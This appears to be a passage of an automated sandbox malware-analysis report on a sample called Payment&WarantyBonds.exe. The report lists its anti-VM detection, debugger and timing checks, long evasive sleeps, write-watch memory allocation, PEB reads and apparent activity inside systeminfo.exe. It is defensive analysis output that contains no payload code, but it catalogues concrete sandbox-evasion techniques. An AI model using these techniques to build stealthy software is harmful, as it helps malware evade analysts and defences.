Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: Payment&WarantyBonds.exe PID: 6900, type: MEMORYSTR
Switches to a custom stack to bypass stack traces
Source: C:\Windows\SysWOW64\systeminfo.exe API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\systeminfo.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\systeminfo.exe API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\systeminfo.exe API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\systeminfo.exe API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\systeminfo.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\systeminfo.exe API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\systeminfo.exe API/Special instruction interceptor: Address: 7FFE2220DA44
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Memory allocated: 2800000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Memory allocated: 29C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Memory allocated: 49C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Memory allocated: 88D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Memory allocated: 98D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Memory allocated: 9AD0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Memory allocated: AAD0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Memory allocated: B510000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Memory allocated: C510000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Memory allocated: D510000 memory reserve | memory write watch Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0149D1C0 rdtsc 2_2_0149D1C0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\systeminfo.exe Window / User API: threadDelayed 2967 Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Window / User API: threadDelayed 7006 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe API coverage: 0.8 %
Source: C:\Windows\SysWOW64\systeminfo.exe API coverage: 2.7 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe TID: 1880 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe TID: 4904 Thread sleep count: 2967 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe TID: 4904 Thread sleep time: -5934000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe TID: 4904 Thread sleep count: 7006 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe TID: 4904 Thread sleep time: -14012000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe TID: 6592 Thread sleep time: -70000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe TID: 6592 Thread sleep count: 37 > 30 Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe TID: 6592 Thread sleep time: -55500s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe TID: 6592 Thread sleep count: 39 > 30 Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe TID: 6592 Thread sleep time: -39000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\systeminfo.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\systeminfo.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0056C500 FindFirstFileW,FindNextFileW,FindClose, 7_2_0056C500
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: oDnyHukDVUZk.exe, 00000008.00000002.4147684727.000000000065F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
Source: systeminfo.exe, 00000007.00000002.4147496833.0000000000909000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: firefox.exe, 00000009.00000002.2367290792.0000016C5E48C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\\
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0149D1C0 rdtsc 2_2_0149D1C0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_00417643 LdrLoadDll, 2_2_00417643
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01419148 mov eax, dword ptr fs:[00000030h] 2_2_01419148
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01419148 mov eax, dword ptr fs:[00000030h] 2_2_01419148
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01419148 mov eax, dword ptr fs:[00000030h] 2_2_01419148
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01419148 mov eax, dword ptr fs:[00000030h] 2_2_01419148
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014B4144 mov eax, dword ptr fs:[00000030h] 2_2_014B4144
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014B4144 mov eax, dword ptr fs:[00000030h] 2_2_014B4144
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014B4144 mov ecx, dword ptr fs:[00000030h] 2_2_014B4144
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014B4144 mov eax, dword ptr fs:[00000030h] 2_2_014B4144
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014B4144 mov eax, dword ptr fs:[00000030h] 2_2_014B4144
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01427152 mov eax, dword ptr fs:[00000030h] 2_2_01427152
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014B8158 mov eax, dword ptr fs:[00000030h] 2_2_014B8158
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01426154 mov eax, dword ptr fs:[00000030h] 2_2_01426154
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01426154 mov eax, dword ptr fs:[00000030h] 2_2_01426154
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141C156 mov eax, dword ptr fs:[00000030h] 2_2_0141C156
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014F5152 mov eax, dword ptr fs:[00000030h] 2_2_014F5152
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014B9179 mov eax, dword ptr fs:[00000030h] 2_2_014B9179
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h] 2_2_0141F172
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h] 2_2_0141F172
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h] 2_2_0141F172
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h] 2_2_0141F172
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h] 2_2_0141F172
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h] 2_2_0141F172
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h] 2_2_0141F172
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h] 2_2_0141F172
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h] 2_2_0141F172
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h] 2_2_0141F172
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h] 2_2_0141F172
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h] 2_2_0141F172
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h] 2_2_0141F172
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h] 2_2_0141F172
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h] 2_2_0141F172
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h] 2_2_0141F172
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h] 2_2_0141F172
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h] 2_2_0141F172
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h] 2_2_0141F172
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h] 2_2_0141F172
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141F172 mov eax, dword ptr fs:[00000030h] 2_2_0141F172
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014CA118 mov ecx, dword ptr fs:[00000030h] 2_2_014CA118
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014CA118 mov eax, dword ptr fs:[00000030h] 2_2_014CA118
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014CA118 mov eax, dword ptr fs:[00000030h] 2_2_014CA118
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014CA118 mov eax, dword ptr fs:[00000030h] 2_2_014CA118
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014E0115 mov eax, dword ptr fs:[00000030h] 2_2_014E0115
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01450124 mov eax, dword ptr fs:[00000030h] 2_2_01450124
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01421131 mov eax, dword ptr fs:[00000030h] 2_2_01421131
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01421131 mov eax, dword ptr fs:[00000030h] 2_2_01421131
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141B136 mov eax, dword ptr fs:[00000030h] 2_2_0141B136
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141B136 mov eax, dword ptr fs:[00000030h] 2_2_0141B136
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141B136 mov eax, dword ptr fs:[00000030h] 2_2_0141B136
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141B136 mov eax, dword ptr fs:[00000030h] 2_2_0141B136
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014F51CB mov eax, dword ptr fs:[00000030h] 2_2_014F51CB
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014E61C3 mov eax, dword ptr fs:[00000030h] 2_2_014E61C3
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014E61C3 mov eax, dword ptr fs:[00000030h] 2_2_014E61C3
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145D1D0 mov eax, dword ptr fs:[00000030h] 2_2_0145D1D0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145D1D0 mov ecx, dword ptr fs:[00000030h] 2_2_0145D1D0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0149E1D0 mov eax, dword ptr fs:[00000030h] 2_2_0149E1D0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0149E1D0 mov eax, dword ptr fs:[00000030h] 2_2_0149E1D0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0149E1D0 mov ecx, dword ptr fs:[00000030h] 2_2_0149E1D0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0149E1D0 mov eax, dword ptr fs:[00000030h] 2_2_0149E1D0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0149E1D0 mov eax, dword ptr fs:[00000030h] 2_2_0149E1D0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014F61E5 mov eax, dword ptr fs:[00000030h] 2_2_014F61E5
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014451EF mov eax, dword ptr fs:[00000030h] 2_2_014451EF
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014451EF mov eax, dword ptr fs:[00000030h] 2_2_014451EF
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014451EF mov eax, dword ptr fs:[00000030h] 2_2_014451EF
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014451EF mov eax, dword ptr fs:[00000030h] 2_2_014451EF
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014451EF mov eax, dword ptr fs:[00000030h] 2_2_014451EF
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014451EF mov eax, dword ptr fs:[00000030h] 2_2_014451EF
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014451EF mov eax, dword ptr fs:[00000030h] 2_2_014451EF
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014451EF mov eax, dword ptr fs:[00000030h] 2_2_014451EF
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014451EF mov eax, dword ptr fs:[00000030h] 2_2_014451EF
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014451EF mov eax, dword ptr fs:[00000030h] 2_2_014451EF
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014451EF mov eax, dword ptr fs:[00000030h] 2_2_014451EF
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014451EF mov eax, dword ptr fs:[00000030h] 2_2_014451EF
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014451EF mov eax, dword ptr fs:[00000030h] 2_2_014451EF
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014251ED mov eax, dword ptr fs:[00000030h] 2_2_014251ED
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014C71F9 mov esi, dword ptr fs:[00000030h] 2_2_014C71F9
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014501F8 mov eax, dword ptr fs:[00000030h] 2_2_014501F8
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01460185 mov eax, dword ptr fs:[00000030h] 2_2_01460185
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014DC188 mov eax, dword ptr fs:[00000030h] 2_2_014DC188
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014DC188 mov eax, dword ptr fs:[00000030h] 2_2_014DC188
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A019F mov eax, dword ptr fs:[00000030h] 2_2_014A019F
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A019F mov eax, dword ptr fs:[00000030h] 2_2_014A019F
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A019F mov eax, dword ptr fs:[00000030h] 2_2_014A019F
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A019F mov eax, dword ptr fs:[00000030h] 2_2_014A019F
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141A197 mov eax, dword ptr fs:[00000030h] 2_2_0141A197
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141A197 mov eax, dword ptr fs:[00000030h] 2_2_0141A197
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141A197 mov eax, dword ptr fs:[00000030h] 2_2_0141A197
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01477190 mov eax, dword ptr fs:[00000030h] 2_2_01477190
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D11A4 mov eax, dword ptr fs:[00000030h] 2_2_014D11A4
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D11A4 mov eax, dword ptr fs:[00000030h] 2_2_014D11A4
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D11A4 mov eax, dword ptr fs:[00000030h] 2_2_014D11A4
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D11A4 mov eax, dword ptr fs:[00000030h] 2_2_014D11A4
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0143B1B0 mov eax, dword ptr fs:[00000030h] 2_2_0143B1B0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01422050 mov eax, dword ptr fs:[00000030h] 2_2_01422050
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014C705E mov ebx, dword ptr fs:[00000030h] 2_2_014C705E
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014C705E mov eax, dword ptr fs:[00000030h] 2_2_014C705E
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144B052 mov eax, dword ptr fs:[00000030h] 2_2_0144B052
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A6050 mov eax, dword ptr fs:[00000030h] 2_2_014A6050
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A106E mov eax, dword ptr fs:[00000030h] 2_2_014A106E
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014F5060 mov eax, dword ptr fs:[00000030h] 2_2_014F5060
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01431070 mov eax, dword ptr fs:[00000030h] 2_2_01431070
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01431070 mov ecx, dword ptr fs:[00000030h] 2_2_01431070
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01431070 mov eax, dword ptr fs:[00000030h] 2_2_01431070
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01431070 mov eax, dword ptr fs:[00000030h] 2_2_01431070
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01431070 mov eax, dword ptr fs:[00000030h] 2_2_01431070
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01431070 mov eax, dword ptr fs:[00000030h] 2_2_01431070
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01431070 mov eax, dword ptr fs:[00000030h] 2_2_01431070
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01431070 mov eax, dword ptr fs:[00000030h] 2_2_01431070
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01431070 mov eax, dword ptr fs:[00000030h] 2_2_01431070
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01431070 mov eax, dword ptr fs:[00000030h] 2_2_01431070
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01431070 mov eax, dword ptr fs:[00000030h] 2_2_01431070
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01431070 mov eax, dword ptr fs:[00000030h] 2_2_01431070
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01431070 mov eax, dword ptr fs:[00000030h] 2_2_01431070
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144C073 mov eax, dword ptr fs:[00000030h] 2_2_0144C073
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0149D070 mov ecx, dword ptr fs:[00000030h] 2_2_0149D070
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A4000 mov ecx, dword ptr fs:[00000030h] 2_2_014A4000
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0143E016 mov eax, dword ptr fs:[00000030h] 2_2_0143E016
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0143E016 mov eax, dword ptr fs:[00000030h] 2_2_0143E016
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0143E016 mov eax, dword ptr fs:[00000030h] 2_2_0143E016
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0143E016 mov eax, dword ptr fs:[00000030h] 2_2_0143E016
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141A020 mov eax, dword ptr fs:[00000030h] 2_2_0141A020
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141C020 mov eax, dword ptr fs:[00000030h] 2_2_0141C020
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014E903E mov eax, dword ptr fs:[00000030h] 2_2_014E903E
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014E903E mov eax, dword ptr fs:[00000030h] 2_2_014E903E
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014E903E mov eax, dword ptr fs:[00000030h] 2_2_014E903E
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014E903E mov eax, dword ptr fs:[00000030h] 2_2_014E903E
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014370C0 mov eax, dword ptr fs:[00000030h] 2_2_014370C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014370C0 mov ecx, dword ptr fs:[00000030h] 2_2_014370C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014370C0 mov ecx, dword ptr fs:[00000030h] 2_2_014370C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014370C0 mov eax, dword ptr fs:[00000030h] 2_2_014370C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014370C0 mov ecx, dword ptr fs:[00000030h] 2_2_014370C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014370C0 mov ecx, dword ptr fs:[00000030h] 2_2_014370C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014370C0 mov eax, dword ptr fs:[00000030h] 2_2_014370C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014370C0 mov eax, dword ptr fs:[00000030h] 2_2_014370C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014370C0 mov eax, dword ptr fs:[00000030h] 2_2_014370C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014370C0 mov eax, dword ptr fs:[00000030h] 2_2_014370C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014370C0 mov eax, dword ptr fs:[00000030h] 2_2_014370C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014370C0 mov eax, dword ptr fs:[00000030h] 2_2_014370C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014370C0 mov eax, dword ptr fs:[00000030h] 2_2_014370C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014370C0 mov eax, dword ptr fs:[00000030h] 2_2_014370C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014370C0 mov eax, dword ptr fs:[00000030h] 2_2_014370C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014370C0 mov eax, dword ptr fs:[00000030h] 2_2_014370C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014370C0 mov eax, dword ptr fs:[00000030h] 2_2_014370C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014370C0 mov eax, dword ptr fs:[00000030h] 2_2_014370C0
